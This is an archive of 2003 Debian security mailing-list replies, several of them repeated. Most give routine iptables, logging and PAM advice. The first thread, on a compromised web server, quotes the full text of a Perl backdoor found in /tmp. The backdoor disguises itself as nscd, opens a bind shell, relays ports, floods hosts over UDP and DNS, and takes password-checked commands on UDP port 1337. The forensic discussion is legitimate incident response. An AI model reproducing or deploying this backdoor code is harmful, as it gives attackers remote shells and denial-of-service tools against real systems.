Re: a weird script worm uploaded via php with debian 3.0 ?
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hi
On Tuesday 10 June 2003 21:58, Robert Ebright wrote:
Have you copy to the new server the home directory of the user www-data?
in debian is located in the root directory of the web server, so if you have
copy the document root from the old server yo have copy all the dot files for
the user , and rather possible you have copy the crontab file of www-data.
If you look syslog entries you can figure out how the worm replicates himself
and how the rootkit is enabled ( only guessing )
> and under SYSLOG it starts
>
the systems find a crontab for the user www-data
user www-data has exec the command crontab -l
> syslog.3:Jun 6 16:27:27 debian crontab[26795]:
> (www-data) LIST (www-data)
and have replaced the file
>syslog.3:Jun 6
> 16:27:28 debiancrontab[26798]:
> (www-data) REPLACE (www-data)
hummm, maybe he isn't very smart, www-data have do it again
>syslog.3:Jun 6
> 16:27:34debian crontab[26804]:
> (www-data) LIST (www-data)syslog.3:Jun 6
> 16:27:34 debiancrontab[26807]:
> (www-data) REPLACE (www-data)
cron sees the new crontab file for www-data , read the file, and execute the
commands...
>syslog.3:Jun 6
> 17:00:01 debian/USR/SBIN/CRON[26937]: (www-data) CMD
> (/tmp/.nscdrecover)
>
hummm you have to figure out how the /tmp/.nscdrecover has been
copy, is difficult to say but maybe another www-data crontab entry of the
user www-data starts the work who knows...
> so I found /tmp/.ncsdrecover and it looks like
> some kind of port scanner/trojan
>
it sounds like a local exploit against nscd which is trying to get a root
shell and put it on the wire
> the contents are pasted below
>
>
> #!/usr/bin/perl -w
>
> $pass = "J9YcGEyNypkzI";
> $str = 'Mess with the best - die like a
> rest!'x1337;
> use IO::Socket;
> use IO::Select;
> use POSIX;
>
> sub redir
> {
> my $port = shift;
> my $dest = shift;
> $SIG{ALRM} = sub { exit };
> alarm 60;
> $sa = IO::Socket::INET->new( Proto => "tcp",
> Listen => 1, ReuseAddr => 1,
> LocalPort =>$port) or exit;
> $sin = $sa->accept or exit;
> close($sa);
> alarm 0;
> $sout = IO::Socket::INET->new( Proto => "tcp",
> PeerAddr => $dest) or exit;$sin->autoflush(1);
> $sout->autoflush(1);
> $sel = IO::Select->new($sin, $sout);
> while(@sock = $sel->can_read(180)) {
> foreach $s(@sock) {
> $buf = <$s>; exit unless($buf);
> print $sout $buf if($s eq $sin);
> print $sin $buf if($s eq $sout);
> }}}
>
> sub shell
> {
> my $port = shift;
> $SIG{ALRM} = sub { exit };
> alarm 60;
> use Socket;
> socket(S, PF_INET, SOCK_STREAM, 0);
> setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
> bind(S, sockaddr_in($port, INADDR_ANY));
> listen(S, 1);
> accept(X, S);
> close(S);
> alarm 0;
> open STDIN, "<&X";
> open STDOUT, ">&X";
> open STDERR, ">&X";
> close X;
> exec("/bin/sh");
> }
>
> sub udp
> {
> my $host = shift;
> my $time = shift;
> $sock = IO::Socket::INET->new(Proto =>
> 'udp', PeerAddr => $host,
> PeerPort => int(rand 65535))
> or exit;
> $sock->autoflush(1);$SIG{ALRM} = sub { exit };
> alarm 15 unless(alarm $time);
> print $sock $str while(1);
> }
> }
>
> sub ddns
> {
> my $host = shift;
> my $time = shift;
> $sock = new IO::Socket::INET->new(Proto
> => 'udp', PeerAddr => $host,
> PeerPort => 53) or exit;
> $sock->autoflush(1);
> $SIG{ALRM} = sub { exit };
> alarm 15 unless(alarm $time);
> while(1) {
> my $s = int(rand(89)+10);
> my $r1 = int(rand(89)+10);
> my $r2 = int(rand(89)+10);
> my $r3 = int(rand(89)+10);
> my $r4 = int(rand(89)+10);
>
> send($sock,"$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3
>\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01",0);}}
>
> $0 = '/usr/sbin/nscd'.' 'x100;
> exit if fork;
> $SIG{ALRM} = 'IGNORE';
> $SIG{TERM} = 'IGNORE';
> $SIG{CHLD} = 'IGNORE';
> $SIG{INT} = 'IGNORE';
> $SIG{QUIT} = 'IGNORE';
> $SIG{HUP} = 'IGNORE';
> open STDIN, " open STDOUT, ">/dev/null";
> open STDERR, ">/dev/null";
> POSIX::setsid();
>
> $csock = IO::Socket::INET->new(Proto => 'udp',
> LocalPort => 1337, ReuseAddr => 1) or
> exit;while($string =<$csock>)
> {
> chop($string);
> my ($pw, $cmd, $arg1, $arg2) = split "
> ", $string;next unless($cmd);
> next unless($arg1);
> next unless(crypt($pw, $pass) eq $pass);
> if ($cmd eq "ping") {
> my $bsock =
> IO::Socket::INET->new(Proto =>
> 'udp', PeerAddr => $arg1,
> PeerPort => $arg2,
> ReuseAddr => 1) or
> next;
> print $bsock"pong
> ".`uname -mnrs`; close $bsock;
>
Re: a weird script worm uploaded via php with debian 3.0 ?
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hi
On Tuesday 10 June 2003 21:58, Robert Ebright wrote:
Have you copy to the new server the home directory of the user www-data?
in debian is located in the root directory of the web server, so if you have
copy the document root from the old server yo have copy all the dot files for
the user , and rather possible you have copy the crontab file of www-data.
If you look syslog entries you can figure out how the worm replicates himself
and how the rootkit is enabled ( only guessing )
> and under SYSLOG it starts
>
the systems find a crontab for the user www-data
user www-data has exec the command crontab -l
> syslog.3:Jun 6 16:27:27 debian crontab[26795]:
> (www-data) LIST (www-data)
and have replaced the file
>syslog.3:Jun 6
> 16:27:28 debiancrontab[26798]:
> (www-data) REPLACE (www-data)
hummm, maybe he isn't very smart, www-data have do it again
>syslog.3:Jun 6
> 16:27:34debian crontab[26804]:
> (www-data) LIST (www-data)syslog.3:Jun 6
> 16:27:34 debiancrontab[26807]:
> (www-data) REPLACE (www-data)
cron sees the new crontab file for www-data , read the file, and execute the
commands...
>syslog.3:Jun 6
> 17:00:01 debian/USR/SBIN/CRON[26937]: (www-data) CMD
> (/tmp/.nscdrecover)
>
hummm you have to figure out how the /tmp/.nscdrecover has been
copy, is difficult to say but maybe another www-data crontab entry of the
user www-data starts the work who knows...
> so I found /tmp/.ncsdrecover and it looks like
> some kind of port scanner/trojan
>
it sounds like a local exploit against nscd which is trying to get a root
shell and put it on the wire
> the contents are pasted below
>
>
> #!/usr/bin/perl -w
>
> $pass = "J9YcGEyNypkzI";
> $str = 'Mess with the best - die like a
> rest!'x1337;
> use IO::Socket;
> use IO::Select;
> use POSIX;
>
> sub redir
> {
> my $port = shift;
> my $dest = shift;
> $SIG{ALRM} = sub { exit };
> alarm 60;
> $sa = IO::Socket::INET->new( Proto => "tcp",
> Listen => 1, ReuseAddr => 1,
> LocalPort =>$port) or exit;
> $sin = $sa->accept or exit;
> close($sa);
> alarm 0;
> $sout = IO::Socket::INET->new( Proto => "tcp",
> PeerAddr => $dest) or exit;$sin->autoflush(1);
> $sout->autoflush(1);
> $sel = IO::Select->new($sin, $sout);
> while(@sock = $sel->can_read(180)) {
> foreach $s(@sock) {
> $buf = <$s>; exit unless($buf);
> print $sout $buf if($s eq $sin);
> print $sin $buf if($s eq $sout);
> }}}
>
> sub shell
> {
> my $port = shift;
> $SIG{ALRM} = sub { exit };
> alarm 60;
> use Socket;
> socket(S, PF_INET, SOCK_STREAM, 0);
> setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
> bind(S, sockaddr_in($port, INADDR_ANY));
> listen(S, 1);
> accept(X, S);
> close(S);
> alarm 0;
> open STDIN, "<&X";
> open STDOUT, ">&X";
> open STDERR, ">&X";
> close X;
> exec("/bin/sh");
> }
>
> sub udp
> {
> my $host = shift;
> my $time = shift;
> $sock = IO::Socket::INET->new(Proto =>
> 'udp', PeerAddr => $host,
> PeerPort => int(rand 65535))
> or exit;
> $sock->autoflush(1);$SIG{ALRM} = sub { exit };
> alarm 15 unless(alarm $time);
> print $sock $str while(1);
> }
> }
>
> sub ddns
> {
> my $host = shift;
> my $time = shift;
> $sock = new IO::Socket::INET->new(Proto
> => 'udp', PeerAddr => $host,
> PeerPort => 53) or exit;
> $sock->autoflush(1);
> $SIG{ALRM} = sub { exit };
> alarm 15 unless(alarm $time);
> while(1) {
> my $s = int(rand(89)+10);
> my $r1 = int(rand(89)+10);
> my $r2 = int(rand(89)+10);
> my $r3 = int(rand(89)+10);
> my $r4 = int(rand(89)+10);
>
> send($sock,"$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3
>\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01",0);}}
>
> $0 = '/usr/sbin/nscd'.' 'x100;
> exit if fork;
> $SIG{ALRM} = 'IGNORE';
> $SIG{TERM} = 'IGNORE';
> $SIG{CHLD} = 'IGNORE';
> $SIG{INT} = 'IGNORE';
> $SIG{QUIT} = 'IGNORE';
> $SIG{HUP} = 'IGNORE';
> open STDIN, " open STDOUT, ">/dev/null";
> open STDERR, ">/dev/null";
> POSIX::setsid();
>
> $csock = IO::Socket::INET->new(Proto => 'udp',
> LocalPort => 1337, ReuseAddr => 1) or
> exit;while($string =<$csock>)
> {
> chop($string);
> my ($pw, $cmd, $arg1, $arg2) = split "
> ", $string;next unless($cmd);
> next unless($arg1);
> next unless(crypt($pw, $pass) eq $pass);
> if ($cmd eq "ping") {
> my $bsock =
> IO::Socket::INET->new(Proto =>
> 'udp', PeerAddr => $arg1,
> PeerPort => $arg2,
> ReuseAddr => 1) or
> next;
> print $bsock"pong
> ".`uname -mnrs`; close $bsock;
>
Re: chattr +a in /var/log files
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi from .es where everything else is a joke too :PP On Thursday 08 May 2003 21:44, Juan Carlos Silla. wrote: > Hello *: > > I would like set 'a' bit for files in /var/log/ but it makes > imposible to logrotate to rotate log files normaly. Is enough to set > chattr -a in prerotate script? How useful is set 'a' bit for log files? > No much I think, if an intruder gain root access... he could unset > append attribute too. Not? I don't think this kind of things improve security but if you stop to think you could see a lot of problems related to this change not only in logrotate log rotation but in every other system that needs to do so. If you wan't secure logging maybe you find interesting the remote syslogging thread. http://lists.debian.org/debian-security/2003/debian-security-200304/msg00271.html I've seen a lot of problems related to 'chattr and hardening' and i can't see the goodness of the idea even in a happy day. un saludo Victor > > Regars from .es -where adsl is a joke. - -- "El mundo se hace día a día con el esfuerzo de los inteligentes, pero son los imbéciles quienes lo disfrutan". -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE+u7lPEzqHF8R72ekRAmCZAJ9jbb251DjOSzp8diQ5F4Qi5uTEuACfYeMY yflDWnckGhVw5aALEfvgB9g= =yQtF -END PGP SIGNATURE-
Re: Apache http server 2.0
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hi
On Sunday 27 April 2003 00:53, Justin [GHA] wrote:
> I tried the following query and didn't experience anything odd.
> http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%22%2C.%2F%5C%5B%5D%
>2 [EMAIL PROTECTED]
>
> The hex here is the string ,./[EMAIL PROTECTED]()-{}<>;:| '"
> Any combination of these characters will result in only the header of the
> google search,a dn the copyright to be displayed.
Probably i'm missing something but google behaivor seems normal to me and very
secure too.
Google's cgi parse out any special character that recives and only takes care
of the alphanumeric queries, try a empty query in google and you will get
exactly the same page that you query gets, add "potato" to you query string
and you get the results for "potato" search.
The final result is that google's cgi don't let you feed it with any special
character.
>
> I also tried queries such as "�" This returned the same
> results. Although, a query of "0" returned appropriate results,
> "/" returned nothing again. It is speculated that all characters with
> an ASCII value of 0-47, excluding 42, will return nothing.
>
> Further research is need, however, this may only be a bug, rather than
> something that is exploitable.
I think that google's cgi does exactly what google's people expects.
:))
>
> http://search.yahoo.com/bin/[EMAIL PROTECTED]
>E %3D%2B%28%29-%7B%7D%3C%3E%3B%3A%7C+%27%22&ei=UTF-8 also did not display
> anything odd
yahoo did not parse out anything but as you say there's nothing "wrong" with
the results page.
>
> -Justin
> GHA - http://gha.bravepages.com
>
>
>
> - Original Message -
> From: "Kim De Smaele" <[EMAIL PROTECTED]>
> To:
> Cc:
> Sent: Friday, April 25, 2003 5:20 PM
> Subject: Apache http server 2.0
>
> > Hi all,
> >
> > I experienced a very strange apache responce today in our production
> > environment at work. A user in a discussion room a posting containing
> > the following characters:
> >
> > ,,''
> >
> > This gave the result that several pages could not longer be displayed.
> > I also tried this on search engine http://www.google.com which gave the
> > same result. Nothing of results and not even the message "no results
> > found..." could be display. If you even keep on refreshing you will
> > notice that also the google logo will disappear.
> > On our servers, we didn't notice anything in the logs.
> >
> > I have done a test with several browsers and I had every time the same
> > result as described above:
> >
> > Internet Explorer
> > Netscape (windows)
> > Mozilla (Linux)
> > Opera (Linux)
> >
> > Personally I'm not sure but I'm getting the idea that this might me
> > exploitable. For example, executing code/commands after using the
> > characters as mentioned above followed by the code or the commands in a
> > search engine, discussion rooms,...
> >
> > Kind regards,
> >
> > Kim De Smaele
> >
> >
> > --
> > To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> > with a subject of "unsubscribe". Trouble? Contact
>
> [EMAIL PROTECTED]
- --
- --
Abril
Uno de los peores meses para andar metiendo al mundo en guerras absurdas
El resto de meses del mismo tipo son: Enero, Febrero, Marzo, Mayo, Junio,
Julio, Agosto, Septiembre, Octubre, Noviembre y Diciembre.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQE+rOMqEzqHF8R72ekRApXyAJ9ffPsxEwj2HZxoAW1ppjiV9mX1RgCggjC0
wgbmsn/jcporNM6a1BhZ7Mc=
=xXdy
-END PGP SIGNATURE-
Re: iptables rule to block when DNAT is used
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi On Tuesday 08 April 2003 03:04, Hanasaki JiJi wrote: > Firewall has rules to DNAT incoming traffic to a port on a DMZ box. > > how can an iptable rule be written to block some ip addresses before > they get to the rules > iptables -t mangle -A FORWARD > AND > iptables -t nat -A PREROUTING > ??? PREROUTING must be, and only can be, filtered in the FORWARD hook. Best Regards Victor - -- - -- Abril Uno de los peores meses para andar metiendo al mundo en guerras absurdas El resto de meses del mismo tipo son: Enero, Febrero, Marzo, Mayo, Junio, Julio, Agosto, Septiembre, Octubre, Noviembre y Diciembre. -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE+knyiEzqHF8R72ekRAhJbAJ0S5YhNetjHVdcPQBig+bA+kZuY7wCcC6Vp 0U4t3oX9eF87aao/0rOgr5w= =v7r3 -END PGP SIGNATURE-
Re: iptables forwarding to inside firewall
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi On Monday 31 March 2003 02:24, Paul Hampson wrote: > On Sun, Mar 30, 2003 at 05:23:10PM -0500, Robert Brockway wrote: > > On Fri, 28 Mar 2003, Hanasaki JiJi wrote: > > > Working on running a SMTP server inside the firewall that takes > > > incoming SMTP traffic from outside the firewall. The below rules are > > > not working. The firewall refuses connections. Any input on what > > > wrong? > > > > If a remote exploit is found in the MTA running on your internal host (as > > has just occured with sendmail again), an attacker may be able to launch > > a direct attack on this box. Depending on your overall security > > structure they may then be able to attack any number of hosts behind your > > firewall. > > > > Some of the alteratives aren't much better. Running an MTA on your > > firewall is just as bad as a remote exploit here may allow an attack > > access to the root on the firewall, allowing the firewall to be > > circumvented again. > > > > If you have more than 1 static address, an MTA running in a DMZ is > > definately better. This way you could still have your internal MTA being > > port forwarded by restrict access through the firewall by source address, > > such that only your MTA in the DMZ can access the port redirect. If you > > can restrict access by way of network interface on the firewall[1] then > > you're much much better off again as this protects against a spoof. > > I don't quite follow this... Surely if one can break into the > port-forwarded MTA, one can break into DMZ's MTA, which would > then allow the attacker to access the port-forwarding anyway? I think so, if only depends how paranoid you are and how much levels of security you think you need. A lot of people could tell a lot o things against proxies, multiplexors , and talk about the virtues of a nated enviroment... Going back to the original thread i think the problem should be in the forward rule of the internal interface, i can't see any rule like that in the rules and if the default policy of the forward hook is DROP the packets will be rejected at this point. A forward rule allowing this traffic should permit incoming traffic to the internal smtp server. Best Regards Victor - -- - -- Marzo Uno de los peores meses para andar metiendo al mundo en guerras absurdas El resto de meses del mismo tipo son: Enero, Febrero, Abril, Mayo, Junio, Julio, Agosto, Septiembre, Octubre, Noviembre y Diciembre. -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE+h/RxEzqHF8R72ekRAmbyAJ0RTNIiEzTKyGbJDQ/3IaIpJeffXACeMpVU 9/l6t23YWU2Lq3wjyHWjQdg= =uety -END PGP SIGNATURE-
Re: iptables forwarding to inside firewall
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi On Monday 31 March 2003 02:24, Paul Hampson wrote: > On Sun, Mar 30, 2003 at 05:23:10PM -0500, Robert Brockway wrote: > > On Fri, 28 Mar 2003, Hanasaki JiJi wrote: > > > Working on running a SMTP server inside the firewall that takes > > > incoming SMTP traffic from outside the firewall. The below rules are > > > not working. The firewall refuses connections. Any input on what > > > wrong? > > > > If a remote exploit is found in the MTA running on your internal host (as > > has just occured with sendmail again), an attacker may be able to launch > > a direct attack on this box. Depending on your overall security > > structure they may then be able to attack any number of hosts behind your > > firewall. > > > > Some of the alteratives aren't much better. Running an MTA on your > > firewall is just as bad as a remote exploit here may allow an attack > > access to the root on the firewall, allowing the firewall to be > > circumvented again. > > > > If you have more than 1 static address, an MTA running in a DMZ is > > definately better. This way you could still have your internal MTA being > > port forwarded by restrict access through the firewall by source address, > > such that only your MTA in the DMZ can access the port redirect. If you > > can restrict access by way of network interface on the firewall[1] then > > you're much much better off again as this protects against a spoof. > > I don't quite follow this... Surely if one can break into the > port-forwarded MTA, one can break into DMZ's MTA, which would > then allow the attacker to access the port-forwarding anyway? I think so, if only depends how paranoid you are and how much levels of security you think you need. A lot of people could tell a lot o things against proxies, multiplexors , and talk about the virtues of a nated enviroment... Going back to the original thread i think the problem should be in the forward rule of the internal interface, i can't see any rule like that in the rules and if the default policy of the forward hook is DROP the packets will be rejected at this point. A forward rule allowing this traffic should permit incoming traffic to the internal smtp server. Best Regards Victor - -- - -- Marzo Uno de los peores meses para andar metiendo al mundo en guerras absurdas El resto de meses del mismo tipo son: Enero, Febrero, Abril, Mayo, Junio, Julio, Agosto, Septiembre, Octubre, Noviembre y Diciembre. -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE+h/RxEzqHF8R72ekRAmbyAJ0RTNIiEzTKyGbJDQ/3IaIpJeffXACeMpVU 9/l6t23YWU2Lq3wjyHWjQdg= =uety -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: iptables help to forward ports please
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Thursday 20 March 2003 06:26, Hanasaki JiJi wrote: > been trying to get the following to work for sometime input is most > appreciated > > > internet <=25= firewall iptablerule =port#x=> internalSMTPhost > > how can the firewall be told to: > take all incoming tcp port 25 traffic and send it to > smtp host on port X iptables -t nat -A PREROUTING -p tcp --dport 25 -j DNAT --to-destination \ $SMTP_HOST:$port Remember that if you want to apply filters in a Destination "Nated" port you have to do it in the FORWARD hook ( not in the INPUT hook as usual ), so if you have DROP as default policy in the FORWARD hook DNAT won't work untill you ACCEPT in FORWARD conections destinated to these DNATed ports. > > take all outgoing traffice from smtphost > and send it out to the internet on port 25 iptables -t nat -A POSTROUTING -p tcp -s $SMTP_HOST -j SNAT \ - --to INTERNET This rule is not exactly what you asked for but you have to take care not only of SMTP traffic, SMTP server also need to perform lookups to DNS servers ( yes, you can assing a local one... ). Anyway if you need/want only SMTP conections to be "Nated" you can define the destination port ( 25 ) ( add --dport 25 to the nat rule ) better than source port ( even if you know for sure that SMTP conections are only established from this port ) ( Someone in the SMTP host could connect to any host at any port using 25 as source tcp port, if you define a destination port this kind of malicious conections are disallowed ) but you can also especified a source port ( --sport 25 ) iptables -t nat -A POSTROUTING -p tcp -s $SMTP_HOST -j SNAT \ - --to INTERNET:25 --dport 25 --sport 25 > > Thank you. Kind Regards Victor -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE+eFgREzqHF8R72ekRAr0HAJsHIicvX0bh1MzNVEMgFY2ckCKwBwCfU7id aL55zOh9Gnn0JSOmI7u4xPM= =NXdQ -END PGP SIGNATURE-
Re: iptables help to forward ports please
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Thursday 20 March 2003 06:26, Hanasaki JiJi wrote: > been trying to get the following to work for sometime input is most > appreciated > > > internet <=25= firewall iptablerule =port#x=> internalSMTPhost > > how can the firewall be told to: > take all incoming tcp port 25 traffic and send it to > smtp host on port X iptables -t nat -A PREROUTING -p tcp --dport 25 -j DNAT --to-destination \ $SMTP_HOST:$port Remember that if you want to apply filters in a Destination "Nated" port you have to do it in the FORWARD hook ( not in the INPUT hook as usual ), so if you have DROP as default policy in the FORWARD hook DNAT won't work untill you ACCEPT in FORWARD conections destinated to these DNATed ports. > > take all outgoing traffice from smtphost > and send it out to the internet on port 25 iptables -t nat -A POSTROUTING -p tcp -s $SMTP_HOST -j SNAT \ - --to INTERNET This rule is not exactly what you asked for but you have to take care not only of SMTP traffic, SMTP server also need to perform lookups to DNS servers ( yes, you can assing a local one... ). Anyway if you need/want only SMTP conections to be "Nated" you can define the destination port ( 25 ) ( add --dport 25 to the nat rule ) better than source port ( even if you know for sure that SMTP conections are only established from this port ) ( Someone in the SMTP host could connect to any host at any port using 25 as source tcp port, if you define a destination port this kind of malicious conections are disallowed ) but you can also especified a source port ( --sport 25 ) iptables -t nat -A POSTROUTING -p tcp -s $SMTP_HOST -j SNAT \ - --to INTERNET:25 --dport 25 --sport 25 > > Thank you. Kind Regards Victor -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE+eFgREzqHF8R72ekRAr0HAJsHIicvX0bh1MzNVEMgFY2ckCKwBwCfU7id aL55zOh9Gnn0JSOmI7u4xPM= =NXdQ -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: new pam error message in logs
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi there's an open bug in sid related to pam limits ans ssh: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=171673. On Monday 17 March 2003 15:10, Adrian 'Dagurashibanipal' von Bidder wrote: > Hi! > > The symptoms are: > > Mar 17 14:08:20 syydelaervli pam_limits[24325]: setrlimit limit #7 to > soft=-1, hard=-1 failed: Operation not permitted; uid=0 euid=0 Mar 17 > 14:09:09 syydelaervli pam_limits[24332]: setrlimit limit #7 to soft=-1, > hard=-1 failed: Operation not permitted; uid=0 euid=0 > > [EMAIL PROTECTED]:~# dpkg -l libpam0g libc6 ssh > Desired=Unknown/Install/Remove/Purge/Hold > > | Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed > |/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: > | uppercase=bad) > | > ||/ Name VersionDescription > > +++-==-==-= >=== ii libpam0g 0.76-9 Pluggable Authentication Modules > library ii libc6 2.3.1-14 GNU C Library: Shared libraries > and Timezone ii ssh3.4p1-4Secure rlogin/rsh/rcp > replacement (OpenSSH) [EMAIL PROTECTED]:~# > > I get these messages occasionally, the process in question is ssh (after > authenticating with pubkey and the 'session opened for user ...' > message). > > I didn't get them before the last pam & libc upgrade, but I haven't got > an idea what versions were there. > > any ideas? > > cheers > -- vbi -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE+deFfEzqHF8R72ekRAi9dAJ95GYYGMrSCxqKxl429sDoO/Wy7rgCfet8H QFR0JCtMN7w2cQtmI+UMjl0= =cC+9 -END PGP SIGNATURE-
Re: new pam error message in logs
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi there's an open bug in sid related to pam limits ans ssh: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=171673. On Monday 17 March 2003 15:10, Adrian 'Dagurashibanipal' von Bidder wrote: > Hi! > > The symptoms are: > > Mar 17 14:08:20 syydelaervli pam_limits[24325]: setrlimit limit #7 to > soft=-1, hard=-1 failed: Operation not permitted; uid=0 euid=0 Mar 17 > 14:09:09 syydelaervli pam_limits[24332]: setrlimit limit #7 to soft=-1, > hard=-1 failed: Operation not permitted; uid=0 euid=0 > > [EMAIL PROTECTED]:~# dpkg -l libpam0g libc6 ssh > Desired=Unknown/Install/Remove/Purge/Hold > > | Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed > |/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: > | uppercase=bad) > | > ||/ Name VersionDescription > > +++-==-==-= >=== ii libpam0g 0.76-9 Pluggable Authentication Modules > library ii libc6 2.3.1-14 GNU C Library: Shared libraries > and Timezone ii ssh3.4p1-4Secure rlogin/rsh/rcp > replacement (OpenSSH) [EMAIL PROTECTED]:~# > > I get these messages occasionally, the process in question is ssh (after > authenticating with pubkey and the 'session opened for user ...' > message). > > I didn't get them before the last pam & libc upgrade, but I haven't got > an idea what versions were there. > > any ideas? > > cheers > -- vbi -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE+deFfEzqHF8R72ekRAi9dAJ95GYYGMrSCxqKxl429sDoO/Wy7rgCfet8H QFR0JCtMN7w2cQtmI+UMjl0= =cC+9 -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: iptables and apt-get
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi there On Tuesday 11 March 2003 15:48, Ian Goodall wrote: > All is fine now. Adding the line: > > iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT > > fixes the problem. Does anyone know what this line does? I found this using > an online script generator at http://www.iptables.1go.dk/index1.php. You are probably using some ftp server in your sources.list, ftp and probably you are using the so called active ftp, in this kind of connections server itselft initiate data transfers conection with the client host ( so , SYNs are sended directly from server to client, and in a fiweralled enviroment they are dropped. The added rule takes care of this kind of conections telling iptables that SYNs sended from the ftp server to the client host are related to a established ftp conection opened from the client host to the server and should be permited ( even when they come with a SYN request from the server) ( it acts like a state module ( somehow related to ip_masq modules tu ftp, quake o irc ) that ensure that this kind or conections ( that used a range of ports higher than 1023 , but not asigned until the conection is established ) I' ll hope it helps, excuse my english and have a look to Netfilter Howto, any good page about ftp server in firewalled enviroments will help to. Have a look at: http://slacksite.com/other/ftp.html And if you are very very interesting you can allways look for the ftp rfc. > > Thanks for all your help. This is the sort of thing that this list should > be used for instead of debating what should be on it / other spam :) > - Original Message - Kind Regards Victor > From: "I.R.van Dongen" <[EMAIL PROTECTED]> > To: "Ian Goodall" <[EMAIL PROTECTED]> > Cc: > Sent: Tuesday, March 11, 2003 12:59 PM > Subject: Re: iptables and apt-get > > > iptables -A OUTPUT -p tcp -d /32 --dport 80 -j ACCEPT > > > > On Tue, 11 Mar 2003 00:45:48 - > > > > "Ian Goodall" <[EMAIL PROTECTED]> wrote: > > > Hi Guys, > > > > > > I am setting up iptables on my debain woody box. I have decided to > > > close > > everyting and then open up just ssh and ssl. This obviously prevents my > apt-get update from working. What ports do I need to open for this to work. > If it helps I am going through a proxy to get to the internet. > > > > Thanks > > > > > > ijg0 -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE+bguJEzqHF8R72ekRApCeAJ9xBSZUqs/4anueP+qUXevmwLMEdQCfTg43 NBzKsI3G9/3SKJN8+N2J540= =opBe -END PGP SIGNATURE-
Re: iptables and apt-get
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi there On Tuesday 11 March 2003 15:48, Ian Goodall wrote: > All is fine now. Adding the line: > > iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT > > fixes the problem. Does anyone know what this line does? I found this using > an online script generator at http://www.iptables.1go.dk/index1.php. You are probably using some ftp server in your sources.list, ftp and probably you are using the so called active ftp, in this kind of connections server itselft initiate data transfers conection with the client host ( so , SYNs are sended directly from server to client, and in a fiweralled enviroment they are dropped. The added rule takes care of this kind of conections telling iptables that SYNs sended from the ftp server to the client host are related to a established ftp conection opened from the client host to the server and should be permited ( even when they come with a SYN request from the server) ( it acts like a state module ( somehow related to ip_masq modules tu ftp, quake o irc ) that ensure that this kind or conections ( that used a range of ports higher than 1023 , but not asigned until the conection is established ) I' ll hope it helps, excuse my english and have a look to Netfilter Howto, any good page about ftp server in firewalled enviroments will help to. Have a look at: http://slacksite.com/other/ftp.html And if you are very very interesting you can allways look for the ftp rfc. > > Thanks for all your help. This is the sort of thing that this list should > be used for instead of debating what should be on it / other spam :) > - Original Message - Kind Regards Victor > From: "I.R.van Dongen" <[EMAIL PROTECTED]> > To: "Ian Goodall" <[EMAIL PROTECTED]> > Cc: <[EMAIL PROTECTED]> > Sent: Tuesday, March 11, 2003 12:59 PM > Subject: Re: iptables and apt-get > > > iptables -A OUTPUT -p tcp -d /32 --dport 80 -j ACCEPT > > > > On Tue, 11 Mar 2003 00:45:48 - > > > > "Ian Goodall" <[EMAIL PROTECTED]> wrote: > > > Hi Guys, > > > > > > I am setting up iptables on my debain woody box. I have decided to > > > close > > everyting and then open up just ssh and ssl. This obviously prevents my > apt-get update from working. What ports do I need to open for this to work. > If it helps I am going through a proxy to get to the internet. > > > > Thanks > > > > > > ijg0 -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see 